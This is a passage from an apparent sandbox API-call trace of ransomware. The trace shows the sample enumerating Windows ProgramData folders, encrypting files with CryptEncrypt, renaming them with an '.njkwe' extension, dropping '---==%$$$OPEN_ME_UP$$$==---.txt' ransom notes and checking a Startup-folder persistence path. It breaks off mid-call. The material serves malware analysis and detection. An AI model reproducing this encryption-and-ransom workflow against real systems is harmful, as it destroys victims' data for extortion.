[0072.677] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.677] GetProcessHeap () returned 0xbe0000 [0072.677] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc29660 [0072.677] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\*") returned 48 [0072.677] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\*", lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcc3cbc1c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc3cbc1c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x7737cd02, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a2a0 [0072.679] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.679] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.679] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.679] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.679] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.679] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\.") returned 48 [0072.679] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.679] StrStrIW (lpFirst=".", lpSrch=".njkwe") returned 0x0 [0072.679] lstrcmpW (lpString1=".", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0072.679] lstrcmpW (lpString1=".", lpString2="taridd") returned -1 [0072.679] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\.", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.679] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\." (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.679] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcc3cbc1c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc3cbc1c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x7737cd02, ftLastWriteTime.dwHighDateTime=0x1d32793, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.680] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.680] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.680] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.680] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.680] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.680] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\..") returned 49 [0072.680] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.680] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.680] StrStrIW (lpFirst="..", lpSrch=".njkwe") returned 0x0 [0072.680] lstrcmpW (lpString1="..", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned -1 [0072.680] lstrcmpW (lpString1="..", lpString2="taridd") returned -1 [0072.680] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\..", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.680] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\.." (normalized: "c:\\programdata\\microsoft\\crypto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0072.680] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0xcc3cbc1c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc3cbc1c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xcc464582, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", cAlternateFileName="709228~1")) returned 1 [0072.680] lstrcmpiW (lpString1="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="Windows") returned -1 [0072.680] lstrcmpiW (lpString1="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="$Recycle.bin") returned 1 [0072.680] lstrcmpiW (lpString1="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="System Volume Information") returned -1 [0072.680] lstrcmpiW (lpString1="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="Program Files") returned -1 [0072.680] lstrcmpiW (lpString1="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="Program Files (x86)") returned -1 [0072.680] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267") returned 116 [0072.680] StrStrIW (lpFirst="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", lpSrch=".njkwe") returned 0x0 [0072.680] lstrcmpW (lpString1="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.680] lstrcmpW (lpString1="7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267", lpString2="taridd") returned -1 [0072.680] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.680] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.680] GetTickCount () returned 0x1152883 [0072.681] GetTickCount () returned 0x1152883 [0072.681] GetTickCount () returned 0x1152883 [0072.681] GetTickCount () returned 0x1152883 [0072.681] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.681] GetProcessHeap () returned 0xbe0000 [0072.681] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.681] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x61d, lpOverlapped=0x0) returned 1 [0072.682] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.682] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x61d, lpOverlapped=0x0) returned 1 [0072.682] GetProcessHeap () returned 0xbe0000 [0072.683] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.683] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.683] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.683] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.683] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.683] CloseHandle (hObject=0x434) returned 1 [0072.683] GetProcessHeap () returned 0xbe0000 [0072.683] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.683] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267_r00t_{3sXlE5}.njkwe") returned 136 [0072.683] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\7092289d2be9a3ebf1065d0f1c678ab6_e8d761b7-8a68-4187-8c95-75a3788ac267_r00t_{3sxle5}.njkwe")) returned 1 [0072.684] GetProcessHeap () returned 0xbe0000 [0072.684] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.684] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x1b8875cb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x1b8875cb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x1b8875cb, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="D20D9E~1")) returned 1 [0072.684] lstrcmpiW (lpString1="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Windows") returned -1 [0072.684] lstrcmpiW (lpString1="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="$Recycle.bin") returned 1 [0072.684] lstrcmpiW (lpString1="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="System Volume Information") returned -1 [0072.684] lstrcmpiW (lpString1="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Program Files") returned -1 [0072.684] lstrcmpiW (lpString1="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="Program Files (x86)") returned -1 [0072.684] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71") returned 116 [0072.684] StrStrIW (lpFirst="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", lpSrch=".njkwe") returned 0x0 [0072.684] lstrcmpW (lpString1="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0072.684] lstrcmpW (lpString1="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", lpString2="taridd") returned -1 [0072.684] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0072.684] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x434 [0072.684] GetTickCount () returned 0x1152883 [0072.684] GetTickCount () returned 0x1152883 [0072.684] GetTickCount () returned 0x1152883 [0072.684] GetTickCount () returned 0x1152883 [0072.684] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x2c, dwBufLen=0x80 | out: pbData=0x380f220*, pdwDataLen=0x380f2d0*=0x80) returned 1 [0072.684] GetProcessHeap () returned 0xbe0000 [0072.684] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc4d848 [0072.685] ReadFile (in: hFile=0x434, lpBuffer=0xc4d848, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesRead=0x380f2d4*=0x61d, lpOverlapped=0x0) returned 1 [0072.686] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0xfffff9e3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0072.686] WriteFile (in: hFile=0x434, lpBuffer=0xc4d848*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc4d848*, lpNumberOfBytesWritten=0x380f2d4*=0x61d, lpOverlapped=0x0) returned 1 [0072.686] GetProcessHeap () returned 0xbe0000 [0072.686] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc4d848 | out: hHeap=0xbe0000) returned 1 [0072.686] SetFilePointerEx (in: hFile=0x434, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0072.686] WriteFile (in: hFile=0x434, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380f2d4*=0x300, lpOverlapped=0x0) returned 1 [0072.686] WriteFile (in: hFile=0x434, lpBuffer=0x380f220*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x380f220*, lpNumberOfBytesWritten=0x380f2d4*=0x80, lpOverlapped=0x0) returned 1 [0072.686] WriteFile (in: hFile=0x434, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380f2d4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380f2d4*=0x4, lpOverlapped=0x0) returned 1 [0072.686] CloseHandle (hObject=0x434) returned 1 [0072.687] GetProcessHeap () returned 0xbe0000 [0072.687] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc16310 [0072.687] wnsprintfW (in: pszDest=0xc16310, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71_r00t_{3sXlE5}.njkwe") returned 136 [0072.687] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71_r00t_{3sxle5}.njkwe")) returned 1 [0072.687] GetProcessHeap () returned 0xbe0000 [0072.687] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc16310 | out: hHeap=0xbe0000) returned 1 [0072.687] FindNextFileW (in: hFindFile=0xc1a2a0, lpFindFileData=0x380f310 | out: lpFindFileData=0x380f310*(dwFileAttributes=0x24, ftCreationTime.dwLowDateTime=0x1b8875cb, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x1b8875cb, ftLastAccessTime.dwHighDateTime=0x1d32722, ftLastWriteTime.dwLowDateTime=0x1b8875cb, ftLastWriteTime.dwHighDateTime=0x1d32722, nFileSizeHigh=0x0, nFileSizeLow=0x61d, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="d20d9e7d1dcddc105a0d5e00d5e1ad30_33d770d0-06bc-47c5-8714-222cdac43a71", cAlternateFileName="D20D9E~1")) returned 0 [0072.687] FindClose (in: hFindFile=0xc1a2a0 | out: hFindFile=0xc1a2a0) returned 1 [0072.687] wnsprintfW (in: pszDest=0xc29660, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 78 [0072.687] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\SystemKeys\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\systemkeys\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0072.688] WriteFile (in: hFile=0x430, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f2dc, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f2dc*=0x351, lpOverlapped=0x0) returned 1 [0072.689] CloseHandle (hObject=0x430) returned 1 [0072.689] GetProcessHeap () returned 0xbe0000 [0072.689] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc29660 | out: hHeap=0xbe0000) returned 1 [0072.689] FindNextFileW (in: hFindFile=0xc1a320, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xcc3cbc1c, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcc3cbc1c, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xfe648d52, ftLastWriteTime.dwHighDateTime=0x1d32770, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="SystemKeys", cAlternateFileName="SYSTEM~1")) returned 0 [0072.689] FindClose (in: hFindFile=0xc1a320 | out: hFindFile=0xc1a320) returned 1 [0072.689] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\---==%$$$OPEN_ME_UP$$$==---.txt") returned 67 [0072.689] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Crypto\\---==%$$$OPEN_ME_UP$$$==---.txt" (normalized: "c:\\programdata\\microsoft\\crypto\\---==%$$$open_me_up$$$==---.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x42c [0072.690] WriteFile (in: hFile=0x42c, lpBuffer=0x406478*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x380f564, lpOverlapped=0x0 | out: lpBuffer=0x406478*, lpNumberOfBytesWritten=0x380f564*=0x351, lpOverlapped=0x0) returned 1 [0072.765] CloseHandle (hObject=0x42c) returned 1 [0072.841] GetProcessHeap () returned 0xbe0000 [0072.841] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc0e158 | out: hHeap=0xbe0000) returned 1 [0072.842] FindNextFileW (in: hFindFile=0xc19fa0, lpFindFileData=0x380f820 | out: lpFindFileData=0x380f820*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4badec, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="DataMart", cAlternateFileName="")) returned 1 [0072.842] lstrcmpiW (lpString1="DataMart", lpString2="Windows") returned -1 [0072.842] lstrcmpiW (lpString1="DataMart", lpString2="$Recycle.bin") returned 1 [0072.842] lstrcmpiW (lpString1="DataMart", lpString2="System Volume Information") returned -1 [0072.842] lstrcmpiW (lpString1="DataMart", lpString2="Program Files") returned -1 [0072.842] lstrcmpiW (lpString1="DataMart", lpString2="Program Files (x86)") returned -1 [0072.842] wnsprintfW (in: pszDest=0xc27a58, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart") returned 37 [0072.842] lstrcmpW (lpString1="DataMart", lpString2=".") returned 1 [0072.842] lstrcmpW (lpString1="DataMart", lpString2="..") returned 1 [0072.842] lstrcmpW (lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart", lpString2="C:\\Users\\FD1HVy\\Desktop") returned -1 [0072.842] GetProcessHeap () returned 0xbe0000 [0072.842] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc0e158 [0072.842] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\*") returned 39 [0072.842] FindFirstFileW (in: lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\*", lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4badec, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName=".", cAlternateFileName="")) returned 0xc1a160 [0072.843] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0072.843] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0072.843] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0072.843] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0072.843] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0072.843] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\.") returned 39 [0072.843] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0072.843] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4badec, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="..", cAlternateFileName="")) returned 1 [0072.843] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0072.843] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0072.843] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0072.843] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0072.843] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0072.843] wnsprintfW (in: pszDest=0xc0e158, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\DataMart\\..") returned 40 [0072.843] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0072.843] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0072.843] FindNextFileW (in: hFindFile=0xc1a160, lpFindFileData=0x380f598 | out: lpFindFileData=0x380f598*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x17c6f037, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xbd4bb986, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x17c6f037, ftLastWriteTime.dwHighDateTime=0x1d2a02b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="PaidWiFi", cAlternateFileName="")) returned 1 [0072.843] lstrcmpiW (lpString1="PaidWiFi", lpString2="Windows") returned -1 [0072.843] lstrcmpiW (lpString1="PaidWiFi", lpString2="$Recycle.bin") returned 1 [0072.843] lstrcmpiW (lpString1="PaidWiFi", 